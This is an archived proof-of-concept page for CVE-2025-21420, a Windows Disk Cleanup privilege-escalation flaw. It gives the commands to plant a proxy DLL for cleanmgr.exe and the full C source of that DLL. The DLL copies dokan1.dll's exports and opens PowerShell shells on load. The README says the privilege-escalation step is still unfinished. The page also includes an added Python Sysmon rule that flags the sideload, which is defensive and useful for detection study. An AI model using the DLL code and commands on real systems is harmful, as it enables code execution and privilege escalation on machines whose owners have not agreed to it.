Associated Vulnerability
Title: Microsoft Windows link following vulnerability (CVE-2025-21420)
Description: Microsoft Windows is an operating system for personal devices made by the US company Microsoft. Microsoft Windows contains a link following vulnerability. An attacker can exploit it to elevate privileges. The following products and versions are affected: Windows Server 2022 (Server Core installation), Windows Server 2022, Windows Server 2019 (Server Core installation), Windows 10 Version 21H2 for x64-based
Description
We found a way to DLL sideload with cleanmgr.exe
Readme
# CVE-2025-21420 PoC
(Windows Disk Cleanup Tool Elevation of Privilege Vulnerability)
AFAIK, albeit incomplete, this is the first PoC for this CVE.
- https://nvd.nist.gov/vuln/detail/CVE-2025-21420
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21420
We found a way to DLL sideload with cleanmgr.exe
```powershell
$ cp .\dokan1.dll C:\Users\<username>\System32\System32\System32\dokannp1.dll
$ cleanmgr /sageset:2
```
Just use regular `DLL Sideloading` and it will rain shellz. We have not yet tested whether it's sufficient to have the second DLL name only, or whether the first, slightly different one is also used (we may have mistaken the names at first look in ProcMon due to the small font size).
Currently still working on the **PrivEsc** part, but it's very likely just scheduling `cleanmgr.exe` for `NT-Authority\System` or waiting until it's triggered by the system, e.g. by **Filling a Disk** or creating too many temp files.
Warning: The following is still `Research Level` (meaning, total crap code); it will pop hundreds of Message Boxes and shells. The same can be done with much less code.
```c
#include "pch.h"      // MSVC precompiled header; must be the first include when /Yu is used
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

// Export the same names as the genuine dokan1.dll (see the dumpbin listing below)
// so the loader resolves them against this proxy DLL.
__declspec(dllexport) void DokanDebugMode();
__declspec(dllexport) void DokanDriverVersion();
__declspec(dllexport) void DokanGetMountPointList();
__declspec(dllexport) void DokanIsNameInExpression();
__declspec(dllexport) void DokanMain();
__declspec(dllexport) void DokanMapKernelToUserCreateFileFlags();
__declspec(dllexport) void DokanNetworkProviderInstall();
__declspec(dllexport) void DokanNetworkProviderUninstall();
__declspec(dllexport) void DokanNotifyCreate();
__declspec(dllexport) void DokanNotifyDelete();
__declspec(dllexport) void DokanNotifyRename();
__declspec(dllexport) void DokanNotifyUpdate();
__declspec(dllexport) void DokanNotifyXAttrUpdate();
__declspec(dllexport) void DokanNtStatusFromWin32();
__declspec(dllexport) void DokanOpenRequestorToken();
__declspec(dllexport) void DokanReleaseMountPointList();
__declspec(dllexport) void DokanRemoveMountPoint();
__declspec(dllexport) void DokanResetTimeout();
__declspec(dllexport) void DokanServiceDelete();
__declspec(dllexport) void DokanServiceInstall();
__declspec(dllexport) void DokanSetDebugMode();
__declspec(dllexport) void DokanUnmount();
__declspec(dllexport) void DokanUseStdErr();
__declspec(dllexport) void DokanVersion();

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        DokanMain();   // runs on every attach/detach notification
        break;
    }
    return TRUE;
}

void DokanMain() {
    // Proof of execution: a message box, then a PowerShell prompt in the host's context.
    MessageBoxW(NULL, L"Hello World2", L"DLL Message", MB_OK);
    system("powershell.exe");
    HANDLE hThread = NULL;
    wchar_t cmdLine[] = L"powershell.exe";   // unused leftovers from an earlier attempt
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    si.cb = sizeof(si);
    // Spawns a thread that calls back into DokanMain(); this recursion is why the
    // README warns about hundreds of message boxes and shells.
    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DokanDebugMode, NULL, 0, NULL);
    return;
}

// Every exported stub just re-enters DokanMain().
void DokanDebugMode() { DokanMain(); }
void DokanDriverVersion() { DokanMain(); }
void DokanGetMountPointList() { DokanMain(); }
void DokanIsNameInExpression() { DokanMain(); }
void DokanMapKernelToUserCreateFileFlags() { DokanMain(); }
void DokanNetworkProviderInstall() { DokanMain(); }
void DokanNetworkProviderUninstall() { DokanMain(); }
void DokanNotifyCreate() { DokanMain(); }
void DokanNotifyDelete() { DokanMain(); }
void DokanNotifyRename() { DokanMain(); }
void DokanNotifyUpdate() { DokanMain(); }
void DokanNotifyXAttrUpdate() { DokanMain(); }
void DokanNtStatusFromWin32() { DokanMain(); }
void DokanOpenRequestorToken() { DokanMain(); }
void DokanReleaseMountPointList() { DokanMain(); }
void DokanRemoveMountPoint() { DokanMain(); }
void DokanResetTimeout() { DokanMain(); }
void DokanServiceDelete() { DokanMain(); }
void DokanServiceInstall() { DokanMain(); }
void DokanSetDebugMode() { DokanMain(); }
void DokanUnmount() { DokanMain(); }
void DokanUseStdErr() { DokanMain(); }
void DokanVersion() { DokanMain(); }
```
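From the defensive side, what the README describes (cleanmgr.exe loading dokan1.dll or dokannp1.dll from a path under the user's profile instead of C:\Windows\System32) is exactly what image-load telemetry should flag. The Python below is an added example, not part of the PoC repository; it assumes Sysmon Event ID 7 style records with Image, ImageLoaded, Signed and SignatureStatus fields, and the events it scans are constructed samples.

```python
from pathlib import PureWindowsPath

# Loader and module names come from the README; the expected directory is where
# the README's dumpbin listing shows the genuine dokan1.dll.
WATCHED_LOADER = "cleanmgr.exe"
WATCHED_MODULES = {"dokan1.dll", "dokannp1.dll"}
EXPECTED_DIR = PureWindowsPath(r"C:\Windows\System32")

# Constructed Sysmon Event ID 7 (image load) style records, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cleanmgr.exe",
     "ImageLoaded": r"C:\Windows\System32\dokan1.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Windows\System32\cleanmgr.exe",
     "ImageLoaded": r"C:\Users\alice\System32\System32\System32\dokannp1.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\dokan1.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
]

def suspicious_load(event):
    """Return why this load looks like the cleanmgr sideload, or None if it does not."""
    loader = PureWindowsPath(event["Image"]).name.lower()
    module = PureWindowsPath(event["ImageLoaded"])
    if loader != WATCHED_LOADER or module.name.lower() not in WATCHED_MODULES:
        return None
    reasons = []
    # Windows paths are case-insensitive, so compare lower-cased string forms.
    if str(module.parent).lower() != str(EXPECTED_DIR).lower():
        reasons.append(f"loaded from unexpected directory {module.parent}")
    if event.get("Signed", "").lower() != "true" or event.get("SignatureStatus") != "Valid":
        reasons.append("module is not validly signed")
    return "; ".join(reasons) or None

def scan(events):
    """Return (index, ImageLoaded, reason) for every event that trips the rule."""
    hits = []
    for i, ev in enumerate(events):
        reason = suspicious_load(ev)
        if reason:
            hits.append((i, ev["ImageLoaded"], reason))
    return hits

if __name__ == "__main__":
    for idx, path, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {path}: {why}")
```

A real deployment would read the records from the Sysmon log rather than a list; on a host where Dokan is not installed at all, any load of these names by cleanmgr.exe deserves a look.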
## Some Background

```powershell
$ dumpbin /exports C:\Windows\System32\dokan1.dll
Microsoft (R) COFF/PE Dumper Version 14.34.31937.0
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file C:\Windows\System32\dokan1.dll
File Type: DLL
ordinal hint RVA name
1 0 00004E40 DokanDebugMode
2 1 0000F760 DokanDriverVersion
3 2 00006F00 DokanGetMountPointList
4 3 000045F0 DokanIsNameInExpression
5 4 000052E0 DokanMain
6 5 00007230 DokanMapKernelToUserCreateFileFlags
7 6 000098F0 DokanNetworkProviderInstall
8 7 00009B70 DokanNetworkProviderUninstall
9 8 00007530 DokanNotifyCreate
10 9 00007550 DokanNotifyDelete
11 A 00007590 DokanNotifyRename
12 B 00007570 DokanNotifyUpdate
13 C 00007580 DokanNotifyXAttrUpdate
14 D 0000AB80 DokanNtStatusFromWin32
15 E 00001340 DokanOpenRequestorToken
16 F 00007160 DokanReleaseMountPointList
17 10 0000A9F0 DokanRemoveMountPoint
18 11 0000F430 DokanResetTimeout
19 12 00009790 DokanServiceDelete
20 13 00009650 DokanServiceInstall
21 14 00006BE0 DokanSetDebugMode
22 15 00009870 DokanUnmount
23 16 00004E30 DokanUseStdErr
24 17 0000F750 DokanVersion
Summary
6000 .pdata
15000 .rdata
1000 .reloc
1000 .rsrc
60000 .text
1000 _RDATA
```
File Snapshot
[4.0K] /data/pocs/4740a9ddbfa689fd1c73a344224e8a90f70b3986
├── [6.9K] LICENSE
└── [5.9K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.